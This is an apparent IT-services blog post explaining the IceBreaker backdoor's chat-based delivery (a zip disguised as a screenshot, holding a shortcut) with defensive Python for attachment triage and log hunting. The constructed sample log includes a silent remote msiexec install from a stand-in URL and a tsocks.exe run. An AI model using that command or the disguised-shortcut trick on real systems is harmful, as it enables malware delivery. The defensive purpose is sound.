Social engineering has been a threat for some time, and threat actors keep looking for new ways to deceive PC users. IceBreaker is one of the latest examples.
A backdoor threat, IceBreaker is a new malware variant whose origins are currently unknown. Regardless of who is behind it, IceBreaker is a very real and dangerous threat to PC users. So far its presence has mostly been observed in the gaming and gambling industries, but there is every chance it will spread into other sectors.
It’s early days for IceBreaker, with the malware first detected in September 2022, so now is the time to get acquainted with it and put up your defenses.
What is IceBreaker?
Like many social engineering attacks, IceBreaker begins with the threat actor contacting the targeted organization directly. This contact is initiated through a live chat session, usually hosted on the organization’s website. Posing as a customer with a technical problem, the threat actor eventually offers to send the chat agent a screenshot of the problem.
This “screenshot”, usually hosted on a fake website (or sometimes Dropbox), appears to be a .jpg file but is actually a .zip archive. Inside the archive is a Windows shortcut (.lnk) file which, once opened, downloads the IceBreaker malware. Cleverly, the shortcut itself is still named like a picture file to deceive the target. Opening the shortcut not only downloads IceBreaker but also installs and activates it, all without any user prompts.
Once IceBreaker is active, the threat actor can use the malware’s JavaScript components to carry out a range of actions. Behaviour observed in attacks so far includes harvesting data, launching background processes and running scripts fetched from remote locations to maximize the damage. In short, IceBreaker is a significant problem.
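The delivery trick above works because the chat agent trusts the file name. The check that defeats it is to ignore the extension, identify the file by its leading bytes, and, if it turns out to be an archive, look at what is inside. The following is an added example (not code from the article or from any IceBreaker sample): it builds a constructed zip named like a screenshot that holds a shortcut named `screenshot.jpg.lnk`, then runs a triage routine that flags the mismatch and the shortcut member. The shell-link signature used to recognise an .lnk file is the 0x4C header size followed by the shell link CLSID; the sample archive contents are constructed for the example, not a real IceBreaker artifact.

```python
import io
import struct
import zipfile

# Shell link (.lnk) header: HeaderSize 0x4C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} in little-endian GUID layout.
LNK_SIGNATURE = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000C000000000000046")

# Leading bytes that identify common file types; checked instead of the extension.
MAGIC = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"PK\x03\x04", "zip"),
    (b"PK\x05\x06", "zip"),  # empty archive
]
IMAGE_EXTS = {"jpg", "jpeg", "png"}
EXECUTABLE_EXTS = {"lnk", "exe", "msi", "js", "vbs", "bat", "cmd", "ps1", "hta", "scr"}


def sniff(data: bytes) -> str:
    """Return the file type implied by the leading bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def triage_attachment(filename: str, data: bytes) -> dict:
    """Decide whether a file a chat 'customer' sent should be opened.

    Flags a claimed image whose bytes are not an image, and any archive member
    that is a shortcut, is otherwise executable, or carries a double extension
    such as 'shot.jpg.lnk'.
    """
    claimed = extension(filename)
    actual = sniff(data)
    reasons = []
    suspicious = []

    if claimed in IMAGE_EXTS and actual not in ("jpeg", "png"):
        reasons.append(f"named .{claimed} but content is {actual}")

    if actual == "zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    parts = info.filename.lower().split(".")
                    head = zf.read(info.filename)[:len(LNK_SIGNATURE)]
                    is_lnk = head == LNK_SIGNATURE
                    double_ext = len(parts) > 2 and parts[-2] in IMAGE_EXTS
                    if is_lnk or parts[-1] in EXECUTABLE_EXTS or double_ext:
                        suspicious.append(info.filename)
        except zipfile.BadZipFile:
            reasons.append("zip signature but archive does not parse")
        if suspicious:
            reasons.append("archive contains shortcut/executable members")

    return {
        "claimed": claimed,
        "actual": actual,
        "suspicious_members": suspicious,
        "reasons": reasons,
        "verdict": "block" if reasons else "allow",
    }


def build_fake_screenshot() -> bytes:
    """Constructed sample (not a real IceBreaker artifact): a zip that will be
    handed over under an image name, holding a shortcut also named like an image."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("screenshot.jpg.lnk", LNK_SIGNATURE + b"\x00" * 60)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_attachment("screenshot.jpg", build_fake_screenshot()))
    print(triage_attachment("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
```

The same routine can sit in front of whatever download path your chat tooling uses; the important design point is that the verdict never depends on the name the sender chose, only on the bytes and, for archives, on the members.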
How Do You Tackle IceBreaker?
Currently, one of the major problems with the IceBreaker attack is that many anti-malware tools fail to recognize it as dangerous. In fact, as of the time of writing, VirusTotal reports that only 4 out of 60 scanners detect it. That doesn’t mean you can’t protect yourself from IceBreaker and similar attacks; just make sure you do the following:
- Monitor the tools it abuses: if you suspect an IceBreaker attack, monitor the Windows components the malware is known to use. Check for newly created shortcut files, look for unusual activity involving msiexec.exe and watch for any unauthorized use of tsocks.exe. Anything found that relates to these tools is a potential indicator that IceBreaker is active.
- Combat social engineering: educate your staff on the dangers of social engineering, including those who simply staff your live chat. Clicking links or opening files from unknown parties is a major cybersecurity no-no. Even when the person urging a staff member to click seems genuine and the link looks harmless, it could easily compromise your entire IT infrastructure.
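The three indicators in the first bullet (new shortcut files, unusual msiexec.exe activity, unauthorized tsocks.exe) are easy to turn into hunting rules over process-creation events. The following is an added example, not from the article: it runs those rules over a constructed batch of events in a simple pipe-separated layout (time|user|parent|image|command line, a layout invented for this example rather than a real Windows or Sysmon format). The events, user names, paths and addresses are all constructed. The rules deliberately do not fire on the last line, a normal service-side msiexec.exe invocation under services.exe, because msiexec.exe itself is legitimate; what matters is where it is installing from and who launched it.

```python
import re
from dataclasses import dataclass

# Constructed sample events (not real log data): time|user|parent|image|command line
SAMPLE_EVENTS = """\
2023-02-01T09:12:04|CORP\\chatagent|explorer.exe|C:\\Windows\\System32\\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
2023-02-01T09:14:31|CORP\\chatagent|explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c start "" "C:\\Users\\chatagent\\Downloads\\screenshot.jpg.lnk"
2023-02-01T09:14:33|CORP\\chatagent|cmd.exe|C:\\Windows\\System32\\msiexec.exe|msiexec.exe /i https://example.invalid/update.msi /qn
2023-02-01T09:15:02|CORP\\chatagent|msiexec.exe|C:\\Users\\chatagent\\AppData\\Local\\Temp\\tsocks.exe|tsocks.exe 203.0.113.10 1080
2023-02-01T10:02:45|CORP\\admin|services.exe|C:\\Windows\\System32\\msiexec.exe|msiexec.exe /V
"""

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(Downloads|Desktop|AppData\\Local\\Temp)\\", re.IGNORECASE)
SHORTCUT = re.compile(r"\.lnk\b", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    image: str
    reasons: list


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(time: str, user: str, parent: str, image: str, cmdline: str) -> list:
    """Apply the IceBreaker hunting rules to one process-creation event."""
    reasons = []
    name = basename(image)
    # tsocks.exe is not an authorized tool on these hosts; any run is a hit.
    if name == "tsocks.exe":
        reasons.append("tsocks.exe executed; not an authorized tool on this host")
    # msiexec.exe is legitimate, but installing from a URL or a user-writable
    # path is the unusual activity to look for.
    if name == "msiexec.exe" and (REMOTE_URL.search(cmdline) or USER_WRITABLE.search(cmdline)):
        reasons.append("msiexec.exe installing from a remote URL or user-writable path")
    # A shortcut opened out of Downloads/Desktop/Temp matches the delivery step.
    if SHORTCUT.search(cmdline) and USER_WRITABLE.search(cmdline):
        reasons.append("shortcut launched from a download location")
    # Dropped payloads tend to execute from directories the user can write to.
    if USER_WRITABLE.search(image):
        reasons.append("image runs from a user-writable directory")
    return reasons


def triage_events(log_text: str) -> list:
    """Return a Finding for every event that trips at least one rule."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split("|", 4)
        if len(fields) != 5:
            continue  # malformed line; skip rather than guess
        reasons = check_event(*fields)
        if reasons:
            findings.append(Finding(line_no, fields[3], reasons))
    return findings


if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"line {f.line_no}: {f.image}")
        for r in f.reasons:
            print(f"    {r}")
```

On the constructed sample this reports lines 2, 3 and 4 (the shortcut launch, the remote MSI install and the tsocks.exe run from Temp) and nothing for the routine msiexec.exe service call. In practice you would feed it your EDR or Sysmon process-creation events after mapping them into the five fields, and tune the path list to wherever your users actually save downloads.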
For more ways to secure and optimize your business technology, contact your local IT professionals.